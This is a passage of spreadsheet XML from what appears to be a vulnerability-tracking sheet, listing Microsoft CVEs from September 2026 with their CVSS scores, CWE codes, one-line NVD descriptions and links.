      <c r="R467" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="S467" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Microsoft Office Word allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62804</t>
        </is>
      </c>
    </row>
    <row r="468">
      <c r="A468" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B468" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62810</t>
        </is>
      </c>
      <c r="D468" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E468" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F468" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G468" s="5" t="inlineStr"/>
      <c r="H468" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I468" s="5" t="inlineStr"/>
      <c r="J468" s="5" t="inlineStr"/>
      <c r="K468" s="5" t="inlineStr"/>
      <c r="L468" s="5" t="inlineStr"/>
      <c r="M468" s="5" t="inlineStr"/>
      <c r="N468" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O468" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P468" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q468" s="5" t="inlineStr"/>
      <c r="R468" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S468" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Active Directory Certificate Services (AD CS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62810</t>
        </is>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B469" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68787</t>
        </is>
      </c>
      <c r="D469" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E469" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F469" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G469" s="5" t="inlineStr"/>
      <c r="H469" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I469" s="5" t="inlineStr"/>
      <c r="J469" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K469" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L469" s="5" t="inlineStr"/>
      <c r="M469" s="5" t="inlineStr"/>
      <c r="N469" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O469" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P469" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q469" s="5" t="inlineStr"/>
      <c r="R469" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S469" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68787</t>
        </is>
      </c>
    </row>
    <row r="470">
      <c r="A470" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B470" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68832</t>
        </is>
      </c>
      <c r="D470" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E470" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F470" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G470" s="5" t="inlineStr"/>
      <c r="H470" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I470" s="5" t="inlineStr"/>
      <c r="J470" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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0" s="5" t="inlineStr"/>
      <c r="M470" s="5" t="inlineStr"/>
      <c r="N470" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O470" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P470" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q470" s="5" t="inlineStr"/>
      <c r="R470" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S470" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68832</t>
        </is>
      </c>
    </row>
    <row r="471">
      <c r="A471" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B471" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68841</t>
        </is>
      </c>
      <c r="D471" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E471" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F471" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G471" s="5" t="inlineStr"/>
      <c r="H471" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I471" s="5" t="inlineStr"/>
      <c r="J471" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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1" s="5" t="inlineStr"/>
      <c r="M471" s="5" t="inlineStr"/>
      <c r="N471" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O471" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P471" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q471" s="5" t="inlineStr"/>
      <c r="R471" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S471" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68841</t>
        </is>
      </c>
    </row>
    <row r="472">
      <c r="A472" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B472" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68844</t>
        </is>
      </c>
      <c r="D472" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E472" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F472" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G472" s="5" t="inlineStr"/>
      <c r="H472" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I472" s="5" t="inlineStr"/>
      <c r="J472" s="5" t="inlineStr"/>
      <c r="K472" s="5" t="inlineStr"/>
      <c r="L472" s="5" t="inlineStr"/>
      <c r="M472" s="5" t="inlineStr"/>
      <c r="N472" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O472" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P472" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q472" s="5" t="inlineStr"/>
      <c r="R472" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S472" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68844</t>
        </is>
      </c>
    </row>
    <row r="473">
      <c r="A473" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B473" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68845</t>
        </is>
      </c>
      <c r="D473" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E473" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F473" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G473" s="5" t="inlineStr"/>
      <c r="H473" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I473" s="5" t="inlineStr"/>
      <c r="J473" s="5" t="inlineStr"/>
      <c r="K473" s="5" t="inlineStr"/>
      <c r="L473" s="5" t="inlineStr"/>
      <c r="M473" s="5" t="inlineStr"/>
      <c r="N473" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O473" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P473" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q473" s="5" t="inlineStr"/>
      <c r="R473" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S473" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68845</t>
        </is>
      </c>
    </row>
    <row r="474">
      <c r="A474" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B474" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68848</t>
        </is>
      </c>
      <c r="D474" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E474" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F474" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G474" s="5" t="inlineStr"/>
      <c r="H474" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I474" s="5" t="inlineStr"/>
      <c r="J474" s="5" t="inlineStr"/>
      <c r="K474" s="5" t="inlineStr"/>
      <c r="L474" s="5" t="inlineStr"/>
      <c r="M474" s="5" t="inlineStr"/>
      <c r="N474" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O474" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P474" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q474" s="5" t="inlineStr"/>
      <c r="R474" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S474" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68848</t>
        </is>
      </c>
    </row>
    <row r="475">
      <c r="A475" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B475" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68850</t>
        </is>
      </c>
      <c r="D475" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E475" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F475" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G475" s="5" t="inlineStr"/>
      <c r="H475" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I475" s="5" t="inlineStr"/>
      <c r="J475" s="5" t="inlineStr"/>
      <c r="K475" s="5" t="inlineStr"/>
      <c r="L475" s="5" t="inlineStr"/>
      <c r="M475" s="5" t="inlineStr"/>
      <c r="N475" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O475" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P475" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q475" s="5" t="inlineStr"/>
      <c r="R475" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S475" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Account allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68850</t>
        </is>
      </c>
    </row>
    <row r="476">
      <c r="A476" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B476" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68875</t>
        </is>
      </c>
      <c r="D476" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E476" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F476" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G476" s="5" t="inlineStr"/>
      <c r="H476" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I476" s="5" t="inlineStr"/>
      <c r="J476" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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6" s="5" t="inlineStr"/>
      <c r="M476" s="5" t="inlineStr"/>
      <c r="N476" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O476" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P476" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q476" s="5" t="inlineStr"/>
      <c r="R476" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S476" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows NTFS allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68875</t>
        </is>
      </c>
    </row>
    <row r="477">
      <c r="A477" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B477" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68877</t>
        </is>
      </c>
      <c r="D477" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E477" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F477" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G477" s="5" t="inlineStr"/>
      <c r="H477" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I477" s="5" t="inlineStr"/>
      <c r="J477" s="5" t="inlineStr"/>
      <c r="K477" s="5" t="inlineStr"/>
      <c r="L477" s="5" t="inlineStr"/>
      <c r="M477" s="5" t="inlineStr"/>
      <c r="N477" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O477" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P477" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q477" s="5" t="inlineStr"/>
      <c r="R477" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S477" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68877</t>
        </is>
      </c>
    </row>
    <row r="478">
      <c r="A478" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B478" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68885</t>
        </is>
      </c>
      <c r="D478" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E478" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F478" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G478" s="5" t="inlineStr"/>
      <c r="H478" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I478" s="5" t="inlineStr"/>
      <c r="J478" s="5" t="inlineStr"/>
      <c r="K478" s="5" t="inlineStr"/>
      <c r="L478" s="5" t="inlineStr"/>
      <c r="M478" s="5" t="inlineStr"/>
      <c r="N478" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O478" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P478" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q478" s="5" t="inlineStr"/>
      <c r="R478" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S478" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68885</t>
        </is>
      </c>
    </row>
    <row r="479">
      <c r="A479" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B479" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68888</t>
        </is>
      </c>
      <c r="D479" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E479" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F479" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G479" s="5" t="inlineStr"/>
      <c r="H479" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I479" s="5" t="inlineStr"/>
      <c r="J479" s="5" t="inlineStr"/>
      <c r="K479" s="5" t="inlineStr"/>
      <c r="L479" s="5" t="inlineStr"/>
      <c r="M479" s="5" t="inlineStr"/>
      <c r="N479" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O479" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P479" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q479" s="5" t="inlineStr"/>
      <c r="R479" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S479" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68888</t>
        </is>
      </c>
    </row>
    <row r="480">
      <c r="A480" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B480" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68890</t>
        </is>
      </c>
      <c r="D480" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E480" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F480" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G480" s="5" t="inlineStr"/>
      <c r="H480" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I480" s="5" t="inlineStr"/>
      <c r="J480" s="5" t="inlineStr"/>
      <c r="K480" s="5" t="inlineStr"/>
      <c r="L480" s="5" t="inlineStr"/>
      <c r="M480" s="5" t="inlineStr"/>
      <c r="N480" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O480" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P480" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q480" s="5" t="inlineStr"/>
      <c r="R480" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S480" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68890</t>
        </is>
      </c>
    </row>
    <row r="481">
      <c r="A481" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B481" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68892</t>
        </is>
      </c>
      <c r="D481" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E481" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F481" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G481" s="5" t="inlineStr"/>
      <c r="H481" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I481" s="5" t="inlineStr"/>
      <c r="J481" s="5" t="inlineStr"/>
      <c r="K481" s="5" t="inlineStr"/>
      <c r="L481" s="5" t="inlineStr"/>
      <c r="M481" s="5" t="inlineStr"/>
      <c r="N481" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O481" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P481" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q481" s="5" t="inlineStr"/>
      <c r="R481" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S481" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68892</t>
        </is>
      </c>
    </row>
    <row r="482">
      <c r="A482" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B482" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68896</t>
        </is>
      </c>
      <c r="D482" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E482" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F482" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G482" s="5" t="inlineStr"/>
      <c r="H482" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I482" s="5" t="inlineStr"/>
      <c r="J482" s="5" t="inlineStr"/>
      <c r="K482" s="5" t="inlineStr"/>
      <c r="L482" s="5" t="inlineStr"/>
      <c r="M482" s="5" t="inlineStr"/>
      <c r="N482" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O482" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P482" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q482" s="5" t="inlineStr"/>
      <c r="R482" s="5" t="inlineStr">
        <is>
          <t>CWE-36</t>
        </is>
      </c>
      <c r="S482" s="5" t="inlineStr">
        <is>
          <t>Absolute path traversal in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68896</t>
        </is>
      </c>
    </row>
    <row r="483">
      <c r="A483" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B483" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69265</t>
        </is>
      </c>
      <c r="D483" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E483" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F483" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G483" s="5" t="inlineStr"/>
      <c r="H483" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I483" s="5" t="inlineStr"/>
      <c r="J483" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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3" s="5" t="inlineStr"/>
      <c r="M483" s="5" t="inlineStr"/>
      <c r="N483" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O483" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P483" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q483" s="5" t="inlineStr"/>
      <c r="R483" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S483" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69265</t>
        </is>
      </c>
    </row>
    <row r="484">
      <c r="A484" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B484" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69269</t>
        </is>
      </c>
      <c r="D484" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E484" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F484" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G484" s="5" t="inlineStr"/>
      <c r="H484" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I484" s="5" t="inlineStr"/>
      <c r="J484" s="5" t="inlineStr"/>
      <c r="K484" s="5" t="inlineStr"/>
      <c r="L484" s="5" t="inlineStr"/>
      <c r="M484" s="5" t="inlineStr"/>
      <c r="N484" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O484" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P484" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q484" s="5" t="inlineStr"/>
      <c r="R484" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S484" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69269</t>
        </is>
      </c>
    </row>
    <row r="485">
      <c r="A485" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B485" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69270</t>
        </is>
      </c>
      <c r="D485" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E485" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F485" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G485" s="5" t="inlineStr"/>
      <c r="H485" s="5" t="n">
        <v>0.002</v>
      </c>
